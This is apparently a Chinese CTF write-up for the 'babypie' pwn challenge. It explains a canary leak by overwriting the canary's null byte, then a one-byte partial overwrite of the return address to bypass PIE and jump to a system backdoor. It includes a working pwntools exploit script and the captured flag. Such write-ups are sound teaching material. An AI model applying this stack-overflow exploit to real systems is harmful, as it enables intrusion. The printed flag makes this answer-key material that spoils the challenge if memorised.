linkctf_2018.7_babypie

linkctf_2018.7_babypie
检查安全保护,64位,保护全开

IDA:

并且存在后门,,但是地址都随机化了,不能够直接填写地址,需要通过与固定函数的偏移

可以看到把rbp泄露出来了,同时前面一个地址,不知道是不是canary(按理说会放在ebp-8的位置,也就是前面这个,但是canary一般是以00结尾的,这个没有00的原因是,不能写入那么多字节,由于’\x00’被覆盖掉了,如果不覆盖掉的话就会截断,后面的就不会打印出来了)现在要做的就是要把canary如何打印出来,或者是绕过,或者是劫持__stack_chk_fail

在这里插入图片描述

在这里插入图片描述

现在要做的就是将canary后两位补上00,然后canary泄露出来了,然后就是返回值怎么写呢?地址是随机的,但是从main–>A3E执行system只有最后一个字节不一样,所以只需要溢出返回值的最后一个字节就行了
在这里插入图片描述
在这里插入图片描述
payload = ‘a’*0x28 + p64(canary) + p64(0) + p8(0x3e),成功getshell

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './babypie'
debug = 0
if debug:
    p = remote('node4.buuoj.cn', 26883)
else:
    p = process(file_name)
elf = ELF(file_name)
payload = 'a'*0x28
p.sendline(payload)
p.recvuntil("aaaa\n")
canary = (u64(p.recv(7).rjust(8,b'\x00'))) 
print(hex(canary),"----------")
payload = 'a'*0x28 + p64(canary) + p64(0) + p8(0x3e)
p.send(payload)
p.interactive()

flag{39032360-ca4e-47b2-b7ce-830802eafba4}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值